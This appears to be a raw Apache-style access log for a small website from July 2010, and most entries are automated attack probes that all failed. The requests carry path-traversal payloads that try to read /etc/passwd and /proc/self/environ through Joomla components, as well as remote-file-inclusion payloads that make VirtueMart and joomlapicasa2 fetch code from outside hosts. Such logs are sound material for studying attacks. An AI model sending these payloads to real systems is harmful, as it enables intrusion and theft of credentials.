125.141.91.138 - - [29/Jul/2010:07:34:25 -0700] "GET /logs/access_100721.log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:34:26 -0700] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:34:26 -0700] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:34:44 -0700] "GET /logs/access_100721.log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:34:44 -0700] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:34:45 -0700] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:36:49 -0700] "GET /logs/access_100720.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:37:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:37:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:22 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:24 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:24 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:29 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:39:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:39:57 -0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:39:57 -0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:14 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
93.114.41.85 - - [29/Jul/2010:07:40:18 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.114.41.85 - - [29/Jul/2010:07:40:18 -0700] "POST /logs/access_100721.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.114.41.85 - - [29/Jul/2010:07:40:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:31 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:31 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:40:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:41 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.222.40.33 - - [29/Jul/2010:07:40:41 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:41:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:41:39 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:41:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:41:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
69.175.66.250 - - [29/Jul/2010:07:42:27 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
69.175.66.250 - - [29/Jul/2010:07:42:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
69.175.66.250 - - [29/Jul/2010:07:42:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:29 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:33 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
69.175.66.250 - - [29/Jul/2010:07:42:39 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
69.175.66.250 - - [29/Jul/2010:07:42:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
69.175.66.250 - - [29/Jul/2010:07:42:39 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:46 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.38.78.210 - - [29/Jul/2010:07:42:46 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
72.30.142.92 - - [29/Jul/2010:07:43:11 -0700] "GET /tmp/tmpCo9dcH/ HTTP/1.0" 200 528 "-" "http_load 29jun2005" "sonyafatah.com"
202.229.183.186 - - [29/Jul/2010:07:43:27 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
202.229.183.186 - - [29/Jul/2010:07:43:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
202.229.183.186 - - [29/Jul/2010:07:43:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:43:35 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:43:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:43:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:07:44:00 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:07:44:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:07:44:00 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:07:44:39 -0700] "GET /logs/access_100717.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:45:25 -0700] "GET /logs/access_100719.log//index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:45:25 -0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:45:26 -0700] "GET /logs//index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:45:47 -0700] "GET /logs/access_100719.log//index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:45:47 -0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:45:48 -0700] "GET /logs//index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:30 -0700] "GET /logs/access_100711.log/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:30 -0700] "GET /logs/access_100711.log/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:30 -0700] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:30 -0700] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:31 -0700] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:31 -0700] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:35 -0700] "GET /logs/access_100711.log/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:36 -0700] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:47:36 -0700] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
72.30.142.92 - - [29/Jul/2010:07:47:37 -0700] "GET /tmp/tmpCo9dcH/?S=A HTTP/1.0" 200 528 "-" "http_load 29jun2005" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:47:39 -0700] "GET /logs/access_100628.log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:47:39 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:47:39 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:48:05 -0700] "GET /logs/access_100713.log/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:48:09 -0700] "GET /logs/access_100721.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:48:09 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:48:10 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:48:14 -0700] "GET /logs/access_100713.log/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:48:16 -0700] "GET /logs/access_100713.log/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:48:41 -0700] "GET /logs/access_100719.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:49:19 -0700] "GET /logs/access_100721.log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
93.114.41.85 - - [29/Jul/2010:07:49:30 -0700] "POST /logs/access_100721.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.114.41.85 - - [29/Jul/2010:07:49:30 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.114.41.85 - - [29/Jul/2010:07:49:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:07:50:24 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.210.218.102 - - [29/Jul/2010:07:50:25 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 65485 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "sonyafatah.com"
219.94.128.174 - - [29/Jul/2010:07:51:56 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "sonyafatah.com"
219.94.128.174 - - [29/Jul/2010:07:51:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "sonyafatah.com"
219.94.128.174 - - [29/Jul/2010:07:51:57 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "sonyafatah.com"
219.94.128.174 - - [29/Jul/2010:07:52:03 -0700] "GET /logs/access_100330.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "sonyafatah.com"
219.94.128.174 - - [29/Jul/2010:07:52:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "sonyafatah.com"
219.94.128.174 - - [29/Jul/2010:07:52:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:52:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:52:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
200.175.239.226 - - [29/Jul/2010:07:52:18 -0700] "POST /logs/access_100721.log/*.org HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
